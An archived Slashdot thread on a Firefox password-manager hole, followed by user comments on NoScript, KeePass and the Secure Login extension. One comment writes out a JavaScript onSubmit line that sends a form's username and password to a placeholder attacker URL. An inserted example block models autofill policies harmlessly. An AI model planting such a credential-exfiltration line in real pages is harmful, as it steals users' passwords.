Slashdot Mirror


Holes Remain Open in Firefox Password Manager

juct writes "Although the Mozilla developers have fixed a known hole in the password manager of Firefox & Co, a door remains open for exploitation. According to an article on the heise site, hackers can still use JavaScript to steal passwords from users of the Mozilla, Firefox, and Safari browsers. However, the real problem might not be Firefox' password manager. If users can set up their own pages containing script code on a server, the JavaScript security model breaks. Heise Security demonstrates the possible password theft in a demo. 'From the users' perspective, this means that they should not entrust their passwords to the password manager on web sites that allow other users to create their own pages containing scripts. Otherwise somebody can easily create a page that steals the password as soon as the page is opened ... Users could also disable JavaScript or use add-ons such as NoScript to set up rules to provide additional protection. In the age of Web 2.0 this would, however, mean that many pages would cease to function. On the other hand it is doubtful that by not using a password manager security levels would be raised, since the resultant need to remember passwords often induces users to choose simplistic passwords and use them on multiple sites.'"

10 of 191 comments

  1. Clarification by jojoba_oil · · Score: 5, Informative

    Users could also disable JavaScript or use add-ons such as NoScript to set up rules to provide additional protection. In the age of Web 2.0 this would, however, mean that many pages would cease to function.

    That's very misleading. Allow me to clarify:

    Users could also disable JavaScript, which in the age of Web2.0 would cause many pages to display incorrectly. A better alternative is NoScript!, an add-on that allows users to selectively white-list pages, servers, or domains to use JavaScript.

    1. Re:Clarification by jojoba_oil · · Score: 2, Informative

      Then someone who browses userpages has essentially the equivalent of having JS turned off and gets bugged every 2 seconds. And the potential problem that someone might generate content you want to see and bug it.

      Gets bugged every 2 seconds? Have you used NoScript? It provides a very minimally intrusive bar along the bottom of the browser stating "NoScript has blocked X number of scripts", and you can even turn that off. And without scripting enabled on a page, how do you expect the page to "bug" users to enable JavaScript? The very best they can do is provide a <noscript> tag asking for it -- and then we'd be assuming the user can make the decision themselves.

      Browsing websites such as MySpace works fine without JavaScript -- they want users on their pages, even if their browser doesn't support/enable JavaScript. It is extremely rare that I stumble across a website that I cannot get working. As for user-generated content, that's precisely the reason NoScript! allows you to whitelist specific pages. (Or being that I'm not a dev, perhaps it's just a handy use for that feature).

      Please stop spreading FUD and use an extension before you try to knock it.

    2. Re:Clarification by Anonymous Coward · · Score: 1, Informative

      Browsing websites such as MySpace works fine without JavaScript -- they want users on their pages, even if their browser doesn't support/enable JavaScript.

      Browsing myspace does not work fine without javascript. They use it for at least the "pager" (<< 1 2 3 >>) in the comments/groups/forums. Fine if you want to view only one page I guess....
  2. Re:Lies, damned lies by Anonymous Coward · · Score: 2, Informative

    IE is not affected because it doesn't automatically enter the info into the forms on load.

  3. Re:Firefox password manager by Derek+Pomery · · Score: 4, Informative

    Your first mistake is not setting a master password in Firefox.
    Once you do that it won't be able to read them either.
    Its failure to read the Opera ones means either A) you set a master password in Opera or B) no one cares about Opera so program doesn't even look for them.

    --
    -- perl -e'print pack"H*","6e656d6f406d38792e6f7267"' /. ate my old sig. Bastards.
  4. KeePass by Juneau · · Score: 2, Informative

    Use KeePass http://keepass.info/. Open source, and better automation with websites and much more control than the internal password manager.

  5. Use the Secure Login FF Extension by EMR · · Score: 3, Informative

    By using this extension, the security hole is fixed. Just have to wait around for FF to implement it natively.
    This extension provides a *wand* like Opera has. (which is not affected by this security hole, because of this functionality).

    https://addons.mozilla.org/en-US/firefox/addon/4429

  6. Re:Lies, damned lies by discord5 · · Score: 3, Informative

    I call bullshit. If the "real problem might not be Firefox password manager", then why IE6 and IE7 password managers are not vulnerable?

    Actually, the IE6 and IE7 password managers will most likely be equally vulnerable. If you do a little looking at the code, all they really do is just scoop the login and pass from the input fields. Mozilla fills it in by default if only one login is available. I don't know exactly what IE does in this case, but I'm guessing that even if IE doesn't fill out the password right away, you can still add an extra onSubmit to the form and do your thing.

    From the MSDN website I can quote:

    When the AutoComplete feature is set to save passwords, a password is automatically filled in when a known user name is provided, and the password and user name are stored by URL. When changing passwords, the user is prompted to save the new password.

    So as far as I can tell, you just need to enter a username and be on the correct URL. If by URL they mean "exactly the same page" this won't work unless you can trick the browser somehow, but if it is "the same (sub)domain" it will. Since I don't have an IE at my disposal right now, I can't test it, but I suppose it will work when you use onSubmit.

    document.location="http://some.hackers.url/collect.php?user=" + document.form.user.value + "&pass=" + document.form.pass.value;

    Then redirect to the login page hoping that the site doesn't check referrers (most likely they don't), and you're set to go. Sites that allow users to enter HTML and especially javascript are begging for this sort of thing, and there are much worse things you can do once someone gives you free play with javascript anyway (cookies anyone?)

    Just stating the obvious, although now I'm actually curious if this works on IE...

  7. Secure Login extension by David_W · · Score: 3, Informative

    Do not use a pull model but a push model like the bugmenot extension.

    You know, that's not a bad idea. Apparently someone else had it too. Check out the Secure Login extension. It doesn't use a right click (although I kinda wish it did; may have to suggest that) but it does have a shortcut key and an icon.

    Thanks for saying that; I would have never thought to go looking for such an extension without you saying it.
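
Added example (not part of the thread, and not code from any browser or extension): a simplified model of the autofill decisions discussed in comments 6 and 7, comparing fill-on-load matched by host, fill-on-load matched by exact page, and the push model. The policy names, function names and URLs are hypothetical.

```javascript
// Simplified model of a password manager's autofill decision (added example;
// not Firefox, IE or Secure Login code). All names and URLs are constructed.
const POLICIES = ["host-on-load", "exact-page-on-load", "push"];

function decideAutofill(saved, pageUrl, formAction, policy, userGesture = false) {
  const page = new URL(pageUrl);
  // Resolve a relative action against the page, as a browser would.
  const action = new URL(formAction, page);
  const savedPage = new URL(saved.pageUrl);
  if (page.origin !== savedPage.origin) {
    return { fill: false, reason: "different origin" };
  }
  if (action.origin !== new URL(saved.actionUrl).origin) {
    return { fill: false, reason: "form submits to another origin" };
  }
  switch (policy) {
    case "host-on-load":
      // Any page on the host gets the password placed in the DOM on load,
      // where script running in that page can read the field's value.
      return { fill: true, reason: "host match, filled on load" };
    case "exact-page-on-load":
      return page.pathname === savedPage.pathname
        ? { fill: true, reason: "same page, filled on load" }
        : { fill: false, reason: "path differs from saved login page" };
    case "push":
      // Nothing enters the DOM until the user asks for it.
      return userGesture
        ? { fill: true, reason: "user requested fill" }
        : { fill: false, reason: "waiting for user gesture" };
    default:
      throw new Error(`unknown policy: ${policy}`);
  }
}

// Constructed sample: one saved login, and a user-created page on the same host.
const saved = {
  pageUrl: "https://community.example/login",
  actionUrl: "https://community.example/session",
};
const userPage = "https://community.example/~someuser/profile.html";

function compare() {
  return POLICIES.map((p) => ({
    policy: p,
    loginPage: decideAutofill(saved, saved.pageUrl, "/session", p).fill,
    userPage: decideAutofill(saved, userPage, "/session", p).fill,
  }));
}
console.log(compare());
```
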

  8. Re:Firefox password manager by mhall119 · · Score: 3, Informative

    Last--FF needs a master password set to be even remotely secure with regard to passwords, while Opera does not. This seems like a big hole. If Opera has encrypted your passwords, then it must have a copy of the decryption key stored somewhere in order to read them. It would seem that your program's author just didn't know where the key was, or it would have been able to read the Opera passwords too. Someone can correct me on this if I'm wrong (not a big Opera user), but to me it sounds like security through obscurity.
    --
    http://www.mhall119.com